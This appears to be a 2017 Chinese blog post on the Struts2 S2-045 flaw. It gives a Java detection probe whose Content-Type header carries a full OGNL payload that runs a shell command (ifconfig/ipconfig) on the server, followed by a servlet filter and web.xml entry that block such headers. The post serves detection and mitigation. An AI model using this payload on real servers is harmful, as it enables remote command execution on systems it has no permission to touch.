struts2 s2-045漏洞检测 &临时解决方案

时间:2017-03-09
struts2 漏洞检测代码      (文件上传代码和 exec 命令均来自网络，懒得自己写)
  
  /**
   * S2-045 detection probe: sends a multipart upload whose Content-Type header carries an
   * OGNL expression instead of a normal media type, then prints whatever the server answers.
   *
   * <p>Defender's reading: the only request property relevant to S2-045 is the Content-Type
   * header value (it starts with {@code %{} and references {@code #_memberAccess}); the form
   * fields below are presumably application-specific filler. A patched server, or the
   * ForbiddenAccessFilter further down this page, never evaluates that header and simply
   * returns an error.
   *
   * <p>Known rough edges (left as-is): the FileInputStream and the HttpClient are never
   * closed, {@code fdfsPath} is assigned nothing and the method always returns {@code ""},
   * and a thrown exception is printed rather than reported, so "unreachable" and "not
   * vulnerable" look the same to a caller.
   *
   * @param url      endpoint to probe
   * @param filePath local file attached as the {@code datums} part
   * @return always {@code ""}
   */
  public static String upload(String url,String filePath){
       String fdfsPath = ""; // never assigned; see Javadoc
       try {


           DefaultHttpClient httpclient = new DefaultHttpClient(); // never closed
           HttpPost httppost = new HttpPost(url);
           File file = new File(filePath);
           String name = file.getName();
           InputStream in = new FileInputStream(file); // never closed (no try-with-resources)
           MultipartEntity reqEntity = new MultipartEntity();
           InputStreamBody inputStreamBody = new InputStreamBody(in,name);
           StringBody fileNam = new StringBody(name);
           // The parts below are hard-coded form fields; they do not influence the S2-045 check.
           StringBody dateFlag = new StringBody("20160122152301");
           StringBody datumType = new StringBody("0");
           StringBody uploadWay = new StringBody("0");
           StringBody userId = new StringBody("0538");
           StringBody tenderId = new StringBody("2315");
           StringBody metrialsType = new StringBody("25");
           StringBody ip = new StringBody("0.0.0.1");
           StringBody driverName = new StringBody("huawei");
           StringBody systemVersion = new StringBody("djf");
           StringBody position = new StringBody("信息路38",  Charset.forName("utf8")); 
           reqEntity.addPart("datums", inputStreamBody);
           reqEntity.addPart("fileName", fileNam);
           reqEntity.addPart("dateFlag", dateFlag);
           reqEntity.addPart("datumType", datumType);
           reqEntity.addPart("uploadWay", uploadWay);
           reqEntity.addPart("userId", userId);
           reqEntity.addPart("tenderId", tenderId);
           reqEntity.addPart("metrialsType", metrialsType);
           reqEntity.addPart("ip", ip);
           reqEntity.addPart("driverName", driverName);
           reqEntity.addPart("systemVersion", systemVersion);
           reqEntity.addPart("position", position);  
   // linux variant (#cmd='ifconfig'), commented out
          // httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
            // windows variant (#cmd='ipconfig'). The Content-Type header is the S2-045 injection
            // point: this header value is what a request-header inspection rule (WAF/IDS signature,
            // or the servlet filter below) has to recognise and reject.
   httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
           // Browser-like User-Agent; note for log analysis that the UA alone is not a useful indicator.
           httppost.addHeader("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
           HttpResponse response = httpclient.execute(httppost);
           int statusCode = response.getStatusLine().getStatusCode();


           if(statusCode == HttpStatus.SC_OK){


               System.out.println("服务器正常响应.....");


               HttpEntity resEntity = response.getEntity();
               System.out.println(EntityUtils.toString(resEntity));// read the response body with HttpClient's own utility class


               // NOTE(review): this prints the InputStream object (its toString), not the body;
               // the body was already consumed by EntityUtils.toString above.
               System.out.println(resEntity.getContent());


               EntityUtils.consume(resEntity);
           }else{
             // NOTE(review): getStatusText looks like the commons-httpclient 3.x HttpStatus, while
             // DefaultHttpClient/MultipartEntity are 4.x — confirm which HttpStatus is imported.
             System.out.println(HttpStatus.getStatusText(statusCode));
           }
       } catch (Exception e) {
           // Broad catch: connection refused, timeout and parse errors all end here and are only printed.
           e.printStackTrace();
       }
       System.out.println("结束....");
       return "";
   }


 
/**
 * Entry point: runs one probe against the hard-coded URL with the hard-coded local file.
 * Both values are placeholders (the host is {@code www.xxx.cn}) and must be replaced before use.
 *
 * @param args ignored
 * @throws IOException declared but not thrown here; {@code upload} catches its own exceptions
 */
public static void main(String args[]) throws IOException {
System.out.println("开始....");
upload("http://www.xxx.cn/website/index.do","E:\\www\\index.txt"); 
}

------------------------------------------------------------------------------------------------
临时解决办法
ForbiddenAccessFilter.java


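/**
 * Stopgap servlet filter for S2-045: rejects any request whose Content-Type header carries an
 * OGNL expression before the request can reach Struts' multipart handling.
 *
 * <p>This is a mitigation, not a fix — the durable remedy is upgrading to a patched Struts
 * release. The original check matched only the literal substring {@code ognl}; a header that
 * avoids that class reference would pass. The evaluation trigger is the expression syntax
 * itself, so {@code %{} and {@code ${} are matched as well.
 */
public class ForbiddenAccessFilter extends OncePerRequestFilter {

  /** Substrings whose presence in a Content-Type header marks the request as hostile. */
  private static final String[] OGNL_MARKERS = {"%{", "${", "ognl"};

  /**
   * Returns whether a header value looks like it embeds an OGNL expression.
   *
   * @param headerValue raw header value, may be {@code null} (no header present)
   * @return {@code true} if any marker in {@link #OGNL_MARKERS} occurs in the value
   */
  static boolean looksLikeOgnlInjection(String headerValue) {
    if (headerValue == null) {
      return false;
    }
    for (String marker : OGNL_MARKERS) {
      if (headerValue.contains(marker)) {
        return true;
      }
    }
    return false;
  }

  /**
   * Blocks requests with a suspicious Content-Type, otherwise continues the chain.
   *
   * @param request  incoming request; only its Content-Type header is inspected
   * @param response receives a 403 when the request is blocked
   * @param chain    remainder of the filter chain
   * @throws ServletException propagated from the chain
   * @throws IOException      propagated from the chain or from {@code sendError}
   */
  @Override
  protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,
      FilterChain chain) throws ServletException, IOException {
    String contentType = request.getContentType();
    if (looksLikeOgnlInjection(contentType)) {
      // Log for incident response; CR/LF are stripped so the header cannot forge extra log lines.
      System.out.println("ForbiddenAccessFilter: blocked request from " + request.getRemoteAddr()
          + " with Content-Type " + contentType.replaceAll("[\\r\\n]", " "));
      // An explicit 403 instead of an empty 200, so the block is visible to monitoring and clients.
      response.sendError(HttpServletResponse.SC_FORBIDDEN);
      return;
    }
    chain.doFilter(request, response);
  }
}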


web.xml 配置
<filter>
<filter-name>forbiddenAccessFilter</filter-name>
<filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>forbiddenAccessFilter</filter-name>
<url-pattern>/*</url-pattern>

</filter-mapping>
